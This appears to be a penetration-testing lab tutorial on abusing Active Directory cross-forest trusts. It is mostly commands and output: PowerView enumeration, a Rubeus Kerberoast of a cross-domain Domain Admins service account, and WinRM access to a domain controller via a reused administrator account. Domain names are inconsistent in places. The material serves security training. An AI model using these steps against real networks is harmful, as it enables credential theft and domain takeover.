Cross-Forest Trust Abuse - from Windows

Cross-Forest Kerberoasting

Kerberos attacks such as Kerberoasting and ASREPRoasting can be performed across trusts, depending on the trust direction. In a situation where you are positioned in a domain with either an inbound or bidirectional domain/forest trust, you can likely perform various attacks to gain a foothold. Sometimes you cannot escalate privileges in your current domain, but instead can obtain a Kerberos ticket and crack a hash for an administrative user in another domain that has Domain/Enterprise Admin privileges in both domains.

PS C:\xyz> Get-DomainUser -SPN -Domain LEGALLOGISTICS.LOCAL | select SamAccountName

samaccountname
--------------
krbtgt
mssqlsvc

A quick check shows that this account is a member of the Domain Admins group in the target domain, so if we can Kerberoast it and crack the hash offline, we'd have full admin rights to the target domain.

PS C:\xyz> Get-DomainUser -Domain LEGALLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof
-------------- --------
mssqlsvc       CN=Domain Admins,CN=Users,DC=LEGALLOGISTICS,DC=LOCAL

Performing a Kerberoasting Attacking with Rubeus Using /domain Flag

PS C:\xyz> .\Rubeus.exe kerberoast /domain:LEGALLOGISTICS.LOCAL /user:mssqlsvc /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : mssqlsvc
[*] Target Domain          : LEGALLOGISTICS.LOCAL
[*] Searching path 'LDAP://ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL/DC=LEGALLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : mssqlsvc
[*] DistinguishedName      : CN=mssqlsvc,CN=Users,DC=LEGALLOGISTICS,DC=LOCAL
[*] ServicePrincipalName   : MSSQLsvc/sql01.freightlogstics:1433
[*] PwdLastSet             : 3/24/2022 12:47:52 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssqlsvc$LEGALLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstics:[email protected]*$<SNIP>

We could then run the hash through Hashcat. If it cracks, we've now quickly expanded our access to fully control two domains by leveraging a pretty standard attack and abusing the authentication direction and setup of the bidirectional forest trust.

---

Admin Password Re-Use & Group Membership

We can use the PowerView function Get-DomainForeignGroupMember to enumerate groups with users that do not belong to the domain, also known as foreign group membership. Let's try this against the LEGALLOGISTICS.LOCAL domain with which we have an external bidirectional forest trust.

PS C:\xyz> Get-DomainForeignGroupMember -Domain LEGALLOGISTICS.LOCAL

GroupDomain             : LEGALLOGISTICS.LOCAL
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=LEGALLOGISTICS,DC=LOCAL
MemberDomain            : LEGALLOGISTICS.LOCAL
MemberName              : S-1-5-21-3842939050-3880317879-2865463114-500
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS
                          TICS,DC=LOCAL

PS C:\xyz> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500

LEGALCORP\administrator

The above command output shows that the built-in Administrators group in LEGALLOGISTICS.LOCAL has the built-in Administrator account for the legalcorp.local domain as a member. We can verify this access using the Enter-PSSession cmdlet to connect over WinRM.

PS C:\xyz> Enter-PSSession -ComputerName ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL -Credential LEGALCORP\administrator

[ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL]: PS C:\Users\administrator.LEGALCORP\Documents> whoami
LEGALCORP\administrator

[ACADEMY-EA-DC03.LEGALLOGISTICS.LOCAL]: PS C:\Users\administrator.LEGALCORP\Documents> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
   Primary Dns Suffix  . . . . . . . : LEGALLOGISTICS.LOCAL
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : LEGALLOGISTICS.LOCAL

From the command output above, we can see that we successfully authenticated to the Domain Controller in the LEGALLOGISTICS.LOCAL domain using the Administrator account from the legalcorp.local domain across the bidirectional forest trust. This can be a quick win after taking control of a domain and is always worth checking for if a bidirectional forest trust situation is present during an assessment and the second forest is in-scope.